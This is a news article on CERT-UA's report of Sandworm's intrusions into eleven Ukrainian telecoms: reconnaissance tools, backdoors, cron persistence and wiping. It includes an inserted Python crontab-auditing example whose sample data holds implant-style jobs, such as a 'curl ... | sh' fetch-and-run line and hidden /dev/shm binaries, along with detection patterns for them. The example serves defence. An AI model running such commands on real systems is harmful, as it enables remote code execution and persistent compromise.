Sandworm Hackers from Russia Compromised 11 Ukrainian Telecoms Since May

    State-sponsored Russian hacking group ‘Sandworm’ successfully compromised eleven telecommunication service providers in Ukraine between May and September 2023, according to a report by Ukraine’s Computer Emergency Response Team (CERT-UA). The report, which draws on information from the breached providers and ‘public resources,’ states that Sandworm interfered with the communication systems of these telcos, resulting in service disruptions and potential data breaches. Sandworm, a highly active espionage group affiliated with Russia’s GRU (the armed forces’ military intelligence service), has focused its attacks on Ukraine this year using various tactics, including phishing lures, Android malware, and data wipers.

    To initiate their attacks, Sandworm first conducts reconnaissance on the target telecommunication networks using the ‘masscan’ tool to scan for open ports and exposed services, looking in particular for unprotected RDP or SSH interfaces that can be used to breach the network. Sandworm also employs tools such as ‘ffuf,’ ‘dirbuster,’ ‘gowitness,’ and ‘nmap’ to identify weaknesses in web services that can be used to gain unauthorized access. The group has likewise leveraged compromised VPN accounts lacking multi-factor authentication to infiltrate networks. To avoid detection, Sandworm routes its malicious activity through SOCKS5 proxy servers such as ‘Dante’ running on previously compromised servers within the Ukrainian internet region, so that its traffic appears to originate from local infrastructure and draws less suspicion.

    CERT-UA has identified two backdoors, ‘Poemgate’ and ‘Poseidon,’ in the breached ISP systems. Poemgate captures admin credentials, providing the hackers with additional accounts for lateral movement and deeper network infiltration. Poseidon, on the other hand, is a Linux backdoor that offers full remote computer control capabilities. To ensure persistence, Poseidon modifies Cron to add rogue jobs.
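A defender-side check that follows from the cron persistence described above, added here as an example and not taken from the CERT-UA report: it parses system and per-user crontabs and flags jobs with traits typical of implanted scheduling entries. The sample crontab contents, file paths and IP addresses are constructed, and the indicator patterns are this example's own choice rather than signatures for Poseidon.

```python
import re

# Constructed sample crontabs standing in for /etc/crontab, /etc/cron.d/* and a
# user's crontab; the entries and addresses are invented, not from CERT-UA's report.
SAMPLE_CRONTABS = {
    "/etc/crontab": """SHELL=/bin/sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
""",
    "/var/spool/cron/crontabs/root": """# m h dom mon dow command
*/5 * * * * /dev/shm/.x/update >/dev/null 2>&1
@reboot nohup /tmp/.cache/sd -c 10.0.0.5:443 &
0 3 * * * /usr/local/bin/backup-rotate.sh
""",
    "/etc/cron.d/sysupd": "* * * * * root curl -s http://203.0.113.7/p.sh | sh\n",
}

# Traits that make a scheduled job look more like an implant than an admin task.
SUSPICIOUS = [
    (re.compile(r"(^|\s|=)/(tmp|var/tmp|dev/shm)/"), "runs from a world-writable temp directory"),
    (re.compile(r"/\.[^/\s]+"), "uses a hidden (dot) path component"),
    (re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"), "pipes downloaded content into a shell"),
    (re.compile(r"\bnohup\b"), "detaches itself with nohup"),
    (re.compile(r">\s*/dev/null\s+2>&1"), "discards all output"),
]

def parse_cron_line(line, system_table):
    """Split one crontab line into (schedule, user, command), or None for non-jobs.
    System tables (/etc/crontab, /etc/cron.d/*) carry a user field; user crontabs do not."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"[A-Za-z_][A-Za-z0-9_]*=", line):
        return None                      # blank, comment or VAR=value line
    fields = line.split()
    nsched = 1 if fields[0].startswith("@") else 5   # @reboot/@daily vs. five time fields
    cmd_start = nsched + 1 if system_table else nsched
    if len(fields) <= cmd_start:
        return None
    user = fields[nsched] if system_table else "(crontab owner)"
    return " ".join(fields[:nsched]), user, " ".join(fields[cmd_start:])

def audit_crontabs(tables):
    """Return [(path, user, command, [reasons])] for every job matching an indicator."""
    findings = []
    for path, content in tables.items():
        system_table = path == "/etc/crontab" or path.startswith("/etc/cron.d/")
        for line in content.splitlines():
            job = parse_cron_line(line, system_table)
            if job:
                reasons = [why for pattern, why in SUSPICIOUS if pattern.search(job[2])]
                if reasons:
                    findings.append((path, job[1], job[2], reasons))
    return findings
```

On a live host the same functions can be fed the real files, with the baseline of known-good jobs compared against each run so that only newly added entries need review.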

    Sandworm employs the ‘Whitecat’ tool to eliminate any traces of the attack and delete access logs. In the final stages of the attack, the hackers deploy scripts designed to disrupt services, with a particular focus on Mikrotik equipment, and wipe backups to make recovery more difficult.

    In response to these attacks, CERT-UA advises all service providers in Ukraine to follow the recommendations in its cyber security guide in order to harden their systems and make it more difficult for intruders to breach them.
